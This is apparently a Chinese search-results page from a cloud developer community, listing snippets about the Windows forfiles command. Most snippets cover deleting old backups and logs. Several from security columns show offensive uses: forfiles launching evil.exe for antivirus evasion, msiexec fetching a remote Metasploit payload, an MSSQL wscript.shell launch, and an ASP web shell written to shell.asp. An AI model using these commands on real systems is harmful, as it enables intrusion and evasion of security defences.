- 综合排序
- 最热优先
- 最新优先
- 来自专栏landv
CMD批处理——forfiles命令使用,自动删除过期备份文件
28天以前的扩展名为bkf文件(以当前系统时间为基准) forfiles 自动删除7天前文件 delete2008-09-12 15:01 用forfiles.exe试试。 forfiles /p "d:\test" /s /m *.* /d -7 /c "cmd /c del @path" 做成批处理文件,bat文件与forfiles.exe同一目录下,建一个bat 附上forfiles.exe及帮助。 但如果操作系统是 Windows 2000/XP 就比较麻烦,因为它们没有forfiles命令,只能靠自己写批处理来实现了。 关于forfiles和for的详细信息,可以在Windows的帮助与支持中找到。
5.4K10发布于 2018-05-24 - 来自专栏全栈程序员必看
Windows环境下进行mysql数据库备份[通俗易懂]
single-transaction=TRUE --routines --events "demo" >D:\mysql_backup\backup_demo_%Ymd%.sql ::删除两周前的备份数据 forfiles single-transaction=TRUE --routines --events "demo" >D:\mysql_backup\backup_demo_%Ymd%.sql 对备份文件进行过期删除处理 Forfiles 语法: forfiles [/p Path ] [/m SearchMask ] [/s ] [/c Command ] [/d [{+ | – }] [{MM / DD / YYYY | DD }] /m backup_*.sql 指的是搜索以backup_为前缀,.sql为后缀的文件 /s:指示forfiles 在子目录中搜索。 /c Command:在每个文件上运行指定的Command 。 -d -14:即前14天 ::删除两周前的备份数据 forfiles /p "D:\mysql_backup" /m backup_*.sql -d -14 /c "cmd /c del /f @path
5.1K30编辑于 2022-08-23 - 来自专栏网络安全攻防
Windows应急响应之命令行排查
FORFILES /P C:\WINDOWS /S /M DNS*.* FORFILES /S /M *.txt /C "cmd /c type @file | more" FORFILES /P C: \ /S /M *.bat FORFILES /D -30 /M *.exe /C "cmd /c echo @path 0x09 在 30 前就被更改。" FORFILES /D 2001/01/01 /C "cmd /c echo @fname 在 2001年1月1日就是新的。" FORFILES /D +2024/12/13 /C "cmd /c echo @fname 今天是新的。" FORFILES /M *.exe /D +1 FORFILES /S /M *.doc /C "cmd /c echo @fsize" FORFILES /M *.txt /C "cmd /c if
95011编辑于 2024-12-30 - 来自专栏建站知识
定时监控Windows删除日志脚本
删除日志脚本内容 rem 删除tomcat的日志,保留30天的日志 forfiles /p "D:\apps\apache-tomcat-7.0.82\logs" /s /m *.log /d -30 /c "cmd /c del @path forfiles /p "D:\apps\apache-tomcat-7.0.82\logs" /s /m *.txt /d -30 /c "cmd /c del @path forfiles /p "D:\apps\apache-tomcat-7.0.82\logs" /s /m *.log.* /d -30 /c "cmd /c del @path
2.4K00编辑于 2022-01-03 - 来自专栏网站教程
Windows环境下进行mysql数据库备份
single-transaction=TRUE --routines --events "demo" >D:\mysql_backup\backup_demo_%Ymd%.sql ::删除两周前的备份数据 forfiles single-transaction=TRUE --routines --events "demo" >D:\mysql_backup\backup_demo_%Ymd%.sql 对备份文件进行过期删除处理 Forfiles 语法: forfiles [/p Path ] [/m SearchMask ] [/s ] [/c Command ] [/d [{+ | - }] [{MM / DD / YYYY | DD }]] /m backup_*.sql 指的是搜索以backup_为前缀,.sql为后缀的文件 /s:指示forfiles 在子目录中搜索。 /c Command:在每个文件上运行指定的Command 。 -d -14:即前14天 ::删除两周前的备份数据 forfiles /p "D:\mysql_backup" /m backup_*.sql -d -14 /c "cmd /c del /f @path
2.7K10发布于 2021-08-05 - 来自专栏Gamma安全实验室
免杀技巧-执行系统命令方式总结
Msf监听端口8888 Forfiles: 首先,要说明的是,forfiles是Windows Server 2003内置的命令行文件,其它系统未必适用。 forfiles 是一个命令实用程序,可以选择多个文件并在它们上运行命令,它通常用于批处理作业中,但可能会被滥用以执行任意命令或可执行文件。 命令: forfiles /p c:\windows\system32 /m calc.exe /c C:\tmp\hacker.exe ? Msf开启会话: ? 毫无疑问的是,Hacker.exe 将是forfiles.exe子进程。 当然也可以用windows自带的“运行”来执行命令。
1.8K40发布于 2020-12-23 - 来自专栏黑白天安全团队
IMEWDBLD.exe ByPass360 下载文件
2.查找文件存储路径 forfiles /P "%localappdata%\Microsoft\Windows\INetCache" /S /M * /C "cmd /c echo @path" 参数介绍 /S 指导 forfiles 递归到子目录。像 "DIR /S"。 /M 根据搜索掩码搜索文件。默认搜索掩码是 '*'。 /C 表示为每个文件执行的命令。命令字符串应该用双引号括起来。
1K40发布于 2021-07-16 - 来自专栏网站教程
在Windows环境下使用MySQL:自动定时备份
一、编写备份脚本 rem auther:www.xxx.com rem date:20171222 rem ******MySQL backup start******** @echo off forfiles backup_%Ymd%.sql" @echo on rem ******MySQL backup end******** 这是一段很常见的windows批处理脚本文件,我来简单解释一下其中的关键部分: forfiles /p "E:\mysql\MySQL BackUp" /m backup_*.sql -d -30 /c "cmd /c del /f @path" forfiles 用来对备份目录下的过期备份进行删除
3K30发布于 2021-07-26 - 来自专栏F12sec
实战 | 记一次利用mssql上线
最后请教Se10rc大佬,可以用forfiles /c test.exe,既: Declare @runshell INT Exec SP_OACreate 'wscript.shell',@runshell out Exec SP_OAMeTHOD @runshell,'run',null,'forfiles /c shell.exe';
74910编辑于 2022-09-29 - 来自专栏白安全组
隔空执行的学习总结
/haha.dll -------------- forfiles执行 forfiles.exe /q c:\windows\system32 /m cmd.exe /c "msiexec /q /i
39820编辑于 2023-09-01 - 来自专栏红队蓝军
ATT&CK矩阵的攻与防
进程起的进程,不让执行,当然,这很考验企业的基础设施 白+黑 就执行exe来说,我们出了通过双击,cmd运行以外,还可以存在如下运行方式 利用pcalua Pcalua -m -a axgg.exe 利用forfiles forfiles -P c:\windows\ /m *.prx /c "cmd /c c:\users\axingg\desktop\axgg.exe 利用rundll32执行 rundll32 利用特殊字符串替换 比如我们的命令,forfiles -P c:\windows\ /m .prx /c "cmd /c c:\users\axingg\desktop\axgg.exe 我们-p可以替换为 /p,甚至可以用特殊字符串绕过 forfiles /ᵖ c:\windows\ /m .prx /c "cmd /c c:\users\axingg\desktop\axgg.exe同样也提一个问题,后面的
1.2K20编辑于 2022-07-06 - 来自专栏C++开发学习交流
【bat】获取当前时间并输出带时间的log日志
:~8,2%_%hour%%time:~3,2%%time:~6,2% echo 123 > %filename%.log // 自动删除旧log日志(-i i是几天,如-1就是删除前一天的日志) forfiles
1.6K10编辑于 2024-07-24 - 来自专栏漏洞知识库
基于Windows白名单执行Payload上线Metasploit - 渗透红队笔记
---- 基于白名单Forfukes远程加载Payload上线 Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。 随后让靶机运行命令远程加载Payload上线: forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i http://192.168.2.12
2.8K20发布于 2020-11-25 - 来自专栏Python
Mac OSX系统、Linux、Windows命令行教程
directory popd: pop directory cp: 复制文件或目录 robocopy: 更强大的复制 mv: 移动/重命名文件或目录 more: 按页查看文件 type: 输出整个文件 forfiles
3.2K70发布于 2018-01-23 - 来自专栏潇湘信安
命令执行之文件落地利用总结
\path.txt forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c dir /a/b/s C:\1653042293000.png > path.txt /shell.asp forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c echo ^<%execute request("1")%^> > shell.asp
1.4K20编辑于 2022-09-14 - 来自专栏ConsT27的笔记
基础免杀手法暴风吸入
所有就有一些间接运行exe的方法 forfiles forfiles是一个用于批处理的一个工具,它在找到文件后会执行指定的命令. forfiles /p 指定搜索文件的目录 /m 指定搜索关键词 /c 指定要执行的命令 forfiles /p c:\windows\system32 /m calc.exe /c c:\tmp\evil.exe //evil.exe会成为forfiles.exe的子进程 pcalua pcalua -a c:\tmp\evil.exe //evil.exe不会成为子进程 cmd Hijack 下面命令将弹计算器
1.8K10编辑于 2022-03-15 - 来自专栏全栈程序员必看
批处理教程pdf_批处理怎么用
Forfiles遍历文本内容,forfiles只支持ANSI格式的文本。
2.9K20编辑于 2022-09-23 - 来自专栏数据库相关
CentOS6.7上使用FPM打包制作自己的rpm包
指定包的名字 -v 指定包的版本号 -C 指定打包的相对路径 Change directory to here before searching forfiles
1.7K20发布于 2019-09-18 - 来自专栏Linux运维学习之路
本地yum仓库搭建及rpm软件包定制
指定目标类型,即想要制作为什么包 -n 指定包的名字 -v 指定包的版本号 -C 指定打包的相对路径 Change directory to here before searching forfiles
1.9K50发布于 2018-01-24 - 来自专栏FreeBuf
Slackor:Go语言写的一款C&C服务器
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe
2.2K10发布于 2019-09-17
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号